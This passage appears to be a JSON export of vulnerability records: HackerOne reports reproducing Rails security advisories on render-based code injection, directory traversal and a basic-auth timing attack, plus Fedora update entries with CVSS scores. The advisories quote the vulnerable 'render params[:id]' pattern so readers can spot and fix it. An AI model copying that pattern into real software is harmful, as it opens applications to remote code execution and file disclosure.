"description": "# Possible remote code execution vulnerability in Action Pack.\n\nThere is a possible remote code execution vulnerability in Action Pack.\nThis vulnerability has been assigned the CVE identifier CVE-2016-2098.\n\nVersions Affected: 3.2.x, 4.0.x, 4.1.x, 4.2.x\nNot affected: 5.0+\nFixed Versions: 3.2.22.2, 4.1.14.2, 4.2.5.2\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller or a view may be vulnerable to a code injection.\n\nImpacted code will look like this:\n\n```ruby\nclass TestController < ApplicationController\n def show\n render params[:id]\n end\nend\n```\n\nAn attacker could use the request parameters to coerce the above example\nto execute arbitrary ruby code.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef show\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef show\n render verify_id(params[:id])\nend\n\nprivate\ndef verify_id(id)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided a patch for\nit. It is in git-am format and consist of a single changeset.\n\n* 3-2-secure_inline_with_params.patch - Patch for 3.2 series\n* 4-1-secure_inline_with_params.patch - Patch for 4.1 series\n* 4-2-secure_inline_with_params.patch - Patch for 4.2 series\n\nCredits\n-------\nThanks to both Tobias Kraze from makandra and joernchen of Phenoelit for reporting this!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-01T19:18:59", "type": "hackerone", "title": "Ruby on Rails: Remote code execution using render :inline", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2098"], "modified": "2016-03-01T08:06:35", "id": "H1:113928", "href": "https://hackerone.com/reports/113928", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T01:51:29", "bounty": 1500.0, "description": "# Possible Information Leak Vulnerability in Action View.\n\nThere is a possible directory traversal and information leak vulnerability in\nAction View. This was meant to be fixed on CVE-2016-0752. However the 3.2 patch was not covering\nall the scenarios. This vulnerability has been assigned the CVE identifier\nCVE-2016-2097.\n\nVersions Affected: 3.2.x, 4.0.x, 4.1.x\nNot affected: 4.2+\nFixed Versions: 3.2.22.2, 4.1.14.2\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller may be vulnerable to an information leak vulnerability.\n\nImpacted code will look something like this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nCarefully crafted requests can cause the above code to render files from\nunexpected places like outside the application's view directory, and can\npossibly escalate this to a remote code execution attack.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef index\n render verify_template(params[:id])\nend\n\nprivate\ndef verify_template(name)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for\nit. It is in git-am format and consist of a single changeset.\n\n* 3-2-render_data_leak_2.patch - Patch for 3.2 series\n* 4-1-render_data_leak_2.patch - Patch for 4.1 series\n\nCredits\n-------\nThanks to both Jyoti Singh and Tobias Kraze from makandra for reporting this and working with us in the patch!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-01T10:00:34", "type": "hackerone", "title": "Ruby on Rails: Regarding [CVE-2016-0752] Possible Information Leak Vulnerability in Action View", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097"], "modified": "2016-03-01T14:50:18", "id": "H1:113831", "href": "https://hackerone.com/reports/113831", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T01:51:30", "bounty": 1500.0, "description": "Timing attack vulnerability in basic authentication in Action Controller.\n\nThere is a timing attack vulnerability in the basic authentication support\nin Action Controller. This vulnerability has been assigned the CVE\nidentifier CVE-2015-7576.\n\nVersions Affected: All.\nNot affected: None.\nFixed Versions: 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1\n\nImpact\n------\nDue to the way that Action Controller compares user names and passwords in\nbasic authentication authorization code, it is possible for an attacker to\nanalyze the time taken by a response and intuit the password.\n\nFor example, this string comparison:\n\n \"foo\" == \"bar\"\n\nis possibly faster than this comparison:\n\n \"foo\" == \"fo1\"\n\nAttackers can use this information to attempt to guess the username and\npassword used in the basic authentication system.\n\nYou can tell you application is vulnerable to this attack by looking for\n`http_basic_authenticate_with` method calls in your application.\n\nAll users running an affected release should either upgrade or use one of\nthe workarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nIf you can't upgrade, please use the following monkey patch in an initializer\nthat is loaded before your application:\n\n```\n$ cat config/initializers/basic_auth_fix.rb\nmodule ActiveSupport\n module SecurityUtils\n def secure_compare(a, b)\n return false unless a.bytesize == b.bytesize\n\n l = a.unpack \"C#{a.bytesize}\"\n\n res = 0\n b.each_byte { |byte| res |= byte ^ l.shift }\n res == 0\n end\n module_function :secure_compare\n\n def variable_size_secure_compare(a, b)\n secure_compare(::Digest::SHA256.hexdigest(a), ::Digest::SHA256.hexdigest(b))\n end\n module_function :variable_size_secure_compare\n end\nend\n\nmodule ActionController\n class Base\n def self.http_basic_authenticate_with(options = {})\n before_action(options.except(:name, :password, :realm)) do\n authenticate_or_request_with_http_basic(options[:realm] || \"Application\") do |name, password|\n # This comparison uses & so that it doesn't short circuit and\n # uses `variable_size_secure_compare` so that length information\n # isn't leaked.\n ActiveSupport::SecurityUtils.variable_size_secure_compare(name, options[:name]) &\n ActiveSupport::SecurityUtils.variable_size_secure_compare(password, options[:password])\n end\n end\n end\n end\nend\n```\n\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for\nthe two supported release series. They are in git-am format and consist of a\nsingle changeset.\n\n* 4-1-basic_auth.patch - Patch for 4.1 series\n* 4-2-basic_auth.patch - Patch for 4.2 series\n* 5-0-basic_auth.patch - Patch for 5.0 series\n\nPlease note that only the 4.1.x and 4.2.x series are supported at present. Users\nof earlier unsupported releases are advised to upgrade as soon as possible as we\ncannot guarantee the continued availability of security fixes for unsupported\nreleases.\n\nCredits\n-------\n\nThank you to Daniel Waterworth for reporting the problem and working with us to\nfix it.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2015-10-19T11:01:33", "type": "hackerone", "title": "Ruby on Rails: http_basic_authenticate_with is suseptible to timing attacks.", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2016-03-13T18:08:12", "id": "H1:94568", "href": "https://hackerone.com/reports/94568", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T01:52:17", "bounty": 500.0, "description": "Possible Information Leak Vulnerability in Action View\n\nThere is a possible directory traversal and information leak vulnerability in\nAction View. This vulnerability has been assigned the CVE identifier\nCVE-2016-0752.\n\nVersions Affected: All.\nNot affected: None.\nFixed Versions: 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller may be vulnerable to an information leak vulnerability.\n\nImpacted code will look something like this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nCarefully crafted requests can cause the above code to render files from\nunexpected places like outside the application's view directory, and can\npossibly escalate this to a remote code execution attack.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef index\n render verify_template(params[:id])\nend\n\nprivate\ndef verify_template(name)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for\nthe two supported release series. They are in git-am format and consist of a\nsingle changeset.\n\n* 3-2-render_data_leak.patch - Patch for 3.2 series\n* 4-1-render_data_leak.patch - Patch for 4.1 series\n* 4-2-render_data_leak.patch - Patch for 4.2 series\n* 5-0-render_data_leak.patch - Patch for 5.0 series\n\nPlease note that only the 4.1.x and 4.2.x series are supported at present. Users\nof earlier unsupported releases are advised to upgrade as soon as possible as we\ncannot guarantee the continued availability of security fixes for unsupported\nreleases.\n\nCredits\n-------\nThanks John Poulin for reporting this!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2015-02-01T14:34:27", "type": "hackerone", "title": "Ruby on Rails: Explicit, dynamic render path: Dir. Trav + RCE", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-02-12T18:52:10", "id": "H1:46019", "href": "https://hackerone.com/reports/46019", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling ea sy unit/integration testing that doesn't require a browser. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-02-28T08:31:04", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: rubygem-actionpack-4.2.0-3.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2016-02-28T08:31:04", "id": "FEDORA:2B32A60560AC", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/UTHCEYZLRFTAYCPODZUS4TL4JILNOFKB/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Rich support for attributes, callbacks, validations, observers, serialization, internationalization, and testing. It provides a known set of interfaces for usage in model classes. It also helps building custom ORMs for use outside of the Rails framework. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-02-28T08:31:04", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: rubygem-activemodel-4.2.0-2.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2016-02-28T08:31:04", "id": "FEDORA:4CEEE6059FC3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZS3Y73KZJILTVKKQLFAMEF6JD5FBSYDS/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling ea sy unit/integration testing that doesn't require a browser. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-02-28T12:29:15", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: rubygem-actionpack-4.2.3-4.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7581", "CVE-2016-0751"], "modified": "2016-02-28T12:29:15", "id": "FEDORA:8EFB06087D79", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/PJFW26KQKBYAOA6RTPA4EJVTM32S2PFW/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Simple, battle-tested conventions and helpers for building web pages. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-08-26T10:24:48", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: rubygem-actionview-4.2.5.2-3.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2016-08-26T10:24:48", "id": "FEDORA:287396078F7C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4APXKS7NQ42L26TII23EU4OR5UUM7PGI/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Simple, battle-tested conventions and helpers for building web pages. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-08-26T12:50:04", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: rubygem-actionview-4.2.3-6.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2016-08-26T12:50:04", "id": "FEDORA:CDE8860679E9", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WHYGEL6GEXD5GMJSM2FCGFAPH4NJAWH3/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Utility library which carries commonly used classes and goodies from the Rails framework ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.7, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-02-28T12:28:58", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: rubygem-activesupport-4.2.3-3.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2016-02-28T12:28:58", "id": "FEDORA:4E7DE6087A83", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/6A3GDFA4WQCY2JFPUO5BZHUY543JZ467/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Simple, battle-tested conventions and helpers for building web pages. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-03-17T20:58:05", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: rubygem-actionview-4.2.3-5.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2016-03-17T20:58:05", "id": "FEDORA:23278608B5EB", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/BFNZZACMJHF5CAQQNQ7NFDYXDFZST4NC/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling ea sy unit/integration testing that doesn't require a browser. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-03-17T20:58:04", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: rubygem-actionpack-4.2.3-5.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2016-03-17T20:58:04", "id": "FEDORA:EB70F608B5E9", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/MXL5HL3OOP26J27KL65QCQBSGEOKRPV3/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Simple, battle-tested conventions and helpers for building web pages. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-03-17T21:23:47", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: rubygem-actionview-4.2.0-5.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2016-03-17T21:23:47", "id": "FEDORA:16C07609221C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/6XF27ZQZNQB6F64VC7KOFMRYRDJC3Z2K/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling ea sy unit/integration testing that doesn't require a browser. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-03-17T21:23:47", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: rubygem-actionpack-4.2.0-4.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2016-03-17T21:23:47", "id": "FEDORA:034186092201", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FDS6BW3RRN2GV3HFH52UACFJM5M7YT2R/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Simple, battle-tested conventions and helpers for building web pages. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-02-28T12:29:19", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: 